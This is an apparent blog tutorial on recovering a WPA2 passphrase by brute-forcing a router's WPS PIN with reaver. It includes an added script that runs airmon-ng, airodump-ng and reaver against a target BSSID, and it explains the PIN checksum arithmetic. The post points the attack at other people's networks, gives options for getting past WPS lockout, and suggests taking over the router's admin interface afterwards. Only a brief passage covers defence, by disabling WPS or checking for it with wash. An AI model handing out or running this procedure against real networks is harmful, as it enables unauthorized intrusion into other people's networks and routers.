These instructions are IDENTICAL for both BackTrack 5 R3 & Kali 1!
Side note: this does not work against every WPA2 router. Reaver goes after the WPS PIN, so the target has to have WPS enabled and must not lock WPS after a run of failed PIN attempts; the WPA2 cipher itself (TKIP or CCMP) makes no difference to the attack.
I’ll show how to get around these in a later post.
First, start your WiFi NIC.
Then put it into monitor mode so it captures frames from every nearby network instead of only the one it is associated with.
You’ll see something similar to this screenshot. I let it scan for 10 minutes. Where you see “<length: 8>” there is a hidden WiFi network; scanning a little longer usually reveals the SSID, since it shows up as soon as a client probes for or associates with that network. I dropped the font size so the console window would fit the SSIDs and you could see the full names. After letting the scan run for a while, hit CTRL + C to drop back to the command line, then highlight the MAC address (BSSID) of the network you want to crack and copy it. As far as I’m concerned, anyone who sets their SSID to “yesitssecure” is asking to be proved otherwise.
Type in the “reaver” command and options, paste the MAC address, add -vv (enhanced verbose mode) and hit enter. It starts by hopping channels; once it locks onto the target it begins brute-forcing the WPS PIN immediately. The PIN is eight digits, but the last digit is a checksum and the router confirms each half of the PIN separately, so reaver needs at most about 11,000 attempts rather than 100 million. In my experience this typically takes 9-10 hours.
Here’s what you can expect to see shortly after starting reaver: progress as a percentage and an estimate of seconds per PIN.
Here you can see it completed in roughly 9 1/2 hours from the time I started the scan. It prints a little more statistics info plus the really useful part: the password to connect to the WiFi (the whole reason we’re doing this to begin with, right?). The password is the PSK value, if you hadn’t figured that out. The WPS PIN is the eight-digit number printed on the bottom of the WiFi router. It is meant to let you connect the first time without typing the passphrase: a client that proves it knows the PIN is handed the real WPA passphrase by the router, which is exactly why reaver can print the PSK once it has recovered the PIN.
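The whole procedure above, as an added example that is not the post’s own commands. It assumes the tools that ship on BackTrack 5 R3 / Kali 1 (airmon-ng, airodump-ng and reaver), a wireless NIC named wlan0, and the mon0 monitor interface that airmon-ng created on those releases; the BSSID and channel are constructed placeholders. The second half of the script shows the WPS PIN checksum and keyspace arithmetic that explain why the run takes hours rather than years.

```shell
#!/bin/sh
# Added example for this post, not the author's own commands. Assumes
# airmon-ng, airodump-ng and reaver (BackTrack 5 R3 / Kali 1), a NIC named
# wlan0 and the mon0 monitor interface airmon-ng creates on those releases.
IFACE="${IFACE:-wlan0}"
MON="${MON:-mon0}"
BSSID="${BSSID:-00:11:22:33:44:55}"   # constructed placeholder; copy yours from airodump-ng
CHANNEL="${CHANNEL:-6}"               # constructed placeholder

# Steps 1-2: bring the NIC up and put it into monitor mode.
start_monitor() {
    ifconfig "$IFACE" up
    airmon-ng start "$IFACE"
}

# Step 3: scan. Hidden networks show as "<length: N>" until a client probes for
# or associates with them; Ctrl+C once the target's BSSID is on screen.
scan_networks() {
    airodump-ng "$MON"
}

# Step 4: brute-force the WPS PIN. -c pins the channel so reaver skips hopping,
# -vv is the enhanced verbose output. If the AP starts reporting "WPS locked",
# reaver's -d (delay between attempts) and -L (ignore the locked state) are the
# options to reach for.
run_reaver() {
    reaver -i "$MON" -b "$BSSID" -c "$CHANNEL" -vv
}

# The 8th digit of a WPS PIN is a checksum over the first seven, with weights
# 3,1,3,1,3,1,3 from the first digit. Prints the checksum digit for $1 (7 digits).
wps_pin_checksum() {
    pin=$1 accum=0 i=0
    while [ -n "$pin" ]; do
        d=${pin#"${pin%?}"}   # last remaining digit, taken as a string (no octal surprises)
        pin=${pin%?}
        i=$(( i + 1 ))
        if [ $(( i % 2 )) -eq 1 ]; then accum=$(( accum + 3 * d ))
        else                            accum=$(( accum + d )); fi
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# Exit 0 if $1 is an 8-digit PIN whose last digit matches the checksum.
wps_pin_is_valid() {
    case $1 in
        [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;;
        *) return 1 ;;
    esac
    [ "$(wps_pin_checksum "${1%?}")" = "${1#???????}" ]
}

# The AP acknowledges the two halves of the PIN separately: 10^4 tries for the
# first four digits plus 10^3 for the next three (the checksum is computed).
wps_max_attempts() { echo $(( 10000 + 1000 )); }

# Worst-case run time in minutes at $1 seconds per PIN attempt.
estimate_minutes() { echo $(( $(wps_max_attempts) * $1 / 60 )); }

if [ "${WPS_RUN:-0}" = 1 ]; then
    start_monitor; scan_networks; run_reaver
else
    printf 'worst case: %s PINs, %s minutes at 3 s/PIN\n' "$(wps_max_attempts)" "$(estimate_minutes 3)"
    printf '12345670 valid: %s\n' "$(wps_pin_is_valid 12345670 && echo yes || echo no)"
fi
```

Without WPS_RUN=1 the script only does the arithmetic: 11,000 PINs at 3 seconds each is 550 minutes, which lines up with the 9-10 hours the post reports, and 12345670 (a well-known default PIN that reaver tries early) passes the checksum.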
According to the homework I’ve done, these routers are easily cracked by this method and WPS should be disabled to avoid this vulnerability. I’ve also read that on some routers disabling the feature doesn’t really disable it, which makes it impossible to prevent cracking the device this way. Rather than trust the setting, you can check it: wash (ships with reaver) lists the nearby access points that still advertise WPS in their beacons, and whether they report WPS as locked. I have DD-WRT on my own WiFi, so hopefully those guys actually have it disabled rather than providing the false sense of security the manufacturers do by showing a radio button that says the feature is off when it really isn’t.
One last thing to note. In my experience the router’s web management interface is usually either still on the default login set by the manufacturer, or the only change was setting its password to the same one as the WiFi password we just cracked. If it’s neither, there’s a tool in BackTrack that will crack the web interface, but I have yet to need it. At some point I do want to try it out, and of course if I can get it to work I’ll do a post about it. I hope you enjoyed this and found it educational.
There’s a “WEP Cracking with BackTrack 5 R3” post I did back in October last year if you are interested in cracking WiFi routers that still use WEP. Those can be cracked in half the time of WPA2.
I’ve been meaning to do this post since I did the WEP post. I needed to whittle down the best way to do it, because everything I found online, blogs and YouTube videos alike, didn’t actually work for whatever reason. Through trial and error I found that other people’s methods involved far more steps and a much more complicated process to achieve the same results I get here with at most half the keystrokes and effort.